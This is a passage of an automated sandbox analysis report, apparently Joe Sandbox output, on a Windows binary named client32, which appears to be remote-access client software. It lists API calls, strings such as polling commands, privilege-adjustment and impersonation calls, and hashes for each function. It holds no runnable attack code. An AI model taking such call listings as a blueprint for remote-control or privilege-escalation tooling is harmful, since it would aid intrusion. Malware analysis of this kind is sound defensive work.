                                                                                  • *RecvTimeout, xrefs: 6F9F927B
                                                                                  • ReadSocket - Would block, xrefs: 6F9F928A
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountSleepTick$ErrorLast
                                                                                  • String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
                                                                                  • API String ID: 2495545493-2497412063
                                                                                  • Opcode ID: 2c5d4752eec53ca5ca4f00d9634927b280cd5aa6bee6b4bc10b177138af5680e
                                                                                  • Instruction ID: 551105c8fbbfb559280de8bec8737c09a48bf41777ec097c5af27c04d67ecba6
                                                                                  • Opcode Fuzzy Hash: 2c5d4752eec53ca5ca4f00d9634927b280cd5aa6bee6b4bc10b177138af5680e
                                                                                  • Instruction Fuzzy Hash: 3731B136E01208AFEB10DFB8DD85B9E77B8AB45324F008559E908D71C5E735E9528B91
                                                                                  Function 6FA03130 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 178timethreadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSystemTime.KERNEL32(?,?,?,905C354D,7412D4F6,905C34B3,FFFFFFFF,00000000), ref: 6FA031E2
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6FA2ECB0), ref: 6FA031EC
                                                                                  • GetSystemTime.KERNEL32(?,7412D4F6,905C34B3,FFFFFFFF,00000000), ref: 6FA0322A
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6FA2ECB0), ref: 6FA03234
                                                                                  • EnterCriticalSection.KERNEL32(6FA3B898,?,905C354D), ref: 6FA032BE
                                                                                  • LeaveCriticalSection.KERNEL32(6FA3B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6FA032D3
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6FA0334D
                                                                                    • Part of subcall function 6FA0BA20: __strdup.LIBCMT ref: 6FA0BA3A
                                                                                    • Part of subcall function 6FA0BB00: _free.LIBCMT ref: 6FA0BB2D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
                                                                                  • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                                                  • API String ID: 1510130979-3441452530
                                                                                  • Opcode ID: d37af2e3a7d19b0a301ff5e9b27aa78d2f8d97b3c36ccef1bb9accb288967d7c
                                                                                  • Instruction ID: 4efbd9f74453399cfb9cde31946a6865ef8d72335a335faf6eb92cd89804485a
                                                                                  • Opcode Fuzzy Hash: d37af2e3a7d19b0a301ff5e9b27aa78d2f8d97b3c36ccef1bb9accb288967d7c
                                                                                  • Instruction Fuzzy Hash: 59616672D00719AFCB14EFA4ED81EEEB7B5FF49318F048519E416A7280DB38A544CB61
                                                                                  Function 11145C70 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 175registryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetVersionExA.KERNEL32(111F1EF0,76938400), ref: 11145CA0
                                                                                  • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                  • _memset.LIBCMT ref: 11145CFD
                                                                                    • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76938400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                  • _strncpy.LIBCMT ref: 11145DCA
                                                                                    • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                                  • RegCloseKey.KERNEL32(00000000), ref: 11145E66
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                  • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                  • API String ID: 3299820421-2117887902
                                                                                  • Opcode ID: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                                  • Instruction ID: 72e9b589e9c81c7730d33f5d85faf9c496c6ad46d8e7039c924549f2bc0033ac
                                                                                  • Opcode Fuzzy Hash: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                                  • Instruction Fuzzy Hash: A4510871E0023BABDB21CF61CD41FDEF7B9AB01B0CF1040A9E91D66945E7B16A49CB91
                                                                                  Function 11116880 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 111168D5
                                                                                  • CoCreateInstance.OLE32(111C1AAC,00000000,00000001,111C1ABC,00000000,?,00000000,Client,silent,00000000,00000000,?,1104C49F), ref: 111168EF
                                                                                  • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11116914
                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11116926
                                                                                  • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11116939
                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11116945
                                                                                  • CoUninitialize.COMBASE(00000000), ref: 111169E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                  • String ID: SHELL32.DLL$SHGetSettings
                                                                                  • API String ID: 4195908086-2348320231
                                                                                  • Opcode ID: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                                  • Instruction ID: 86b6e15c13bd198e2be1b4906c6dc8e983a2f790f9ea6f3073e45f268e972f68
                                                                                  • Opcode Fuzzy Hash: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                                  • Instruction Fuzzy Hash: 81515175A00219AFDB00DFA5C9C0EAFFBB9EF48304F114969E915AB244E771A941CB61
                                                                                  Function 11073680 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID: NBCTL32.DLL$_License$serial_no
                                                                                  • API String ID: 2102423945-35127696
                                                                                  • Opcode ID: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                                  • Instruction ID: b632ae2d06a9e035363f4f75e6ccaf6c516ded967162c2d69bbdd490d26a7599
                                                                                  • Opcode Fuzzy Hash: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                                  • Instruction Fuzzy Hash: A8B18075E04209ABE714CF98DC81FEEB7F5FF88304F158169E9499B285DB71A901CB90
                                                                                  Function 11031780 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(1102EA50,?,00000000), ref: 110317A4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID: Client32$NSMWClass$NSMWClass
                                                                                  • API String ID: 3192549508-611217420
                                                                                  • Opcode ID: 0b0c06552eb5d8578d5f8a1ba1b3e93930f4d748b8e68e94dbd9e084aab78c4a
                                                                                  • Instruction ID: 804cb5d527221f69a992b866d17bc63a828f9d1c02720c4f1a032ef46c9a5584
                                                                                  • Opcode Fuzzy Hash: 0b0c06552eb5d8578d5f8a1ba1b3e93930f4d748b8e68e94dbd9e084aab78c4a
                                                                                  • Instruction Fuzzy Hash: C1F04F7890222ADFC30ADF95C995A59B7F4BB8870CB108574D43547208EB3179048B99
                                                                                  Function 1109ED30 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0094CB48,0094CB48,0094CB48,0094CB48,0094CB48,0094CB48,0094CB48,111EFB64,?,00000001,00000001), ref: 1109EDB0
                                                                                  • EqualSid.ADVAPI32(?,0094CB48,?,00000001,00000001), ref: 1109EDC3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InformationToken$AllocateEqualInitialize
                                                                                  • String ID:
                                                                                  • API String ID: 1878589025-0
                                                                                  • Opcode ID: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                                  • Instruction ID: f2a8bc8f74b1de347afb3cb87d534257ea472b44b3b43d4353705adbfce15ac3
                                                                                  • Opcode Fuzzy Hash: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                                  • Instruction Fuzzy Hash: DF213031B0122EABEB10DA98DD95BFEB7B8EB44704F014169E929DB180E671AD10D791
                                                                                  Function 1109D860 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,50D94AA1,00080000,00000000,?), ref: 1109D88D
                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                                  • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                  • String ID:
                                                                                  • API String ID: 2349140579-0
                                                                                  • Opcode ID: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
                                                                                  • Instruction ID: 81f12928af7d2c66371a758247fa27ee71cd04b85772abc6619dfc746b0a2552
                                                                                  • Opcode Fuzzy Hash: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
                                                                                  • Instruction Fuzzy Hash: 4F018CB2640218ABE710DFA4CD89BABF7BCEB04705F004429E91597280D7B06904CBB0
                                                                                  Function 1109D8F0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109EC30,00000244,cant create events), ref: 1109D90C
                                                                                  • CloseHandle.KERNEL32(?,00000000,1109EC30,00000244,cant create events), ref: 1109D915
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                  • String ID:
                                                                                  • API String ID: 81990902-0
                                                                                  • Opcode ID: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                                  • Instruction ID: 1087c1a68057020919897756081cb42e4a012b8ce4d03b8cf520615490e2fd10
                                                                                  • Opcode Fuzzy Hash: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                                  • Instruction Fuzzy Hash: 3CE08C30280214ABE338DE24AD90FA673EDAF05B04F11092DF8A6D2580CA60E8008B60
                                                                                  Function 1102EBD0 Relevance: 252.2, APIs: 32, Strings: 111, Instructions: 1967windowthreadsleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • GetSystemMetrics.USER32(00002000), ref: 1102ED54
                                                                                  • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EF15
                                                                                    • Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                                    • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                    • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                                    • Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                                    • Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EF4B
                                                                                  • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102EF6D
                                                                                  • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102F22F
                                                                                    • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F1C
                                                                                    • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F29
                                                                                    • Part of subcall function 11094F00: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F59
                                                                                  • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EFCC
                                                                                  • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EFD8
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 1102EFF0
                                                                                  • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EFFD
                                                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102F019
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102ED86
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • IsJPIK.PCICHEK(?,?,?,View,Client,Bridge), ref: 1102F3ED
                                                                                  • LoadIconA.USER32(11000000,000004C1), ref: 1102F521
                                                                                  • LoadIconA.USER32(11000000,000004C2), ref: 1102F531
                                                                                  • DestroyCursor.USER32(00000000), ref: 1102F557
                                                                                  • DestroyCursor.USER32(00000000), ref: 1102F568
                                                                                    • Part of subcall function 11028360: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 110283A3
                                                                                    • Part of subcall function 11028360: GetUserNameA.ADVAPI32(?,?), ref: 110283BC
                                                                                    • Part of subcall function 11028360: RevertToSelf.ADVAPI32 ref: 110283DC
                                                                                    • Part of subcall function 11028360: CloseHandle.KERNEL32(00000000), ref: 110283E3
                                                                                  • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1102FB05
                                                                                  • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client), ref: 1102FB58
                                                                                  • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 110300F2
